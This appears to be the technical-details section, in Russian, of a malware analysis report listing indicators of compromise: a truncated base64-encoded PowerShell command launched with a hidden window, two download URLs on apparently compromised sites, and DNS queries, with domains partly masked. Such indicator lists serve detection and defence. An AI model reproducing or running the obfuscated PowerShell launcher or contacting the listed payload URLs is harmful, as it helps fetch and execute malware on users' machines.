Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAEoAUwBYAEQAdgBsAGUAPQAnAEEAVABOAE4ATQBhAHAAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBgAFUAUgBJAGAAVABgAHkAYABwAHIATwBUAE8AQwBPAEwAIgAgAD...
- http://su####academy.com/wp-admin/oSHA/
- http://sm####ngcake.com/blog/HNpury/
- DNS ASK mo##auer.de
- DNS ASK ge##d.de
- DNS ASK su####academy.com
- DNS ASK sm####ngcake.com
- DNS ASK ta###dge.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAEoAUwBYAEQAdgBsAGUAPQAnAEEAVABOAE4ATQBhAHAAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBgAFUAUgBJAGAAVABgAHkAYABwAHIATwBUAE8AQwBPAEwAIgAgAD...' (со скрытым окном)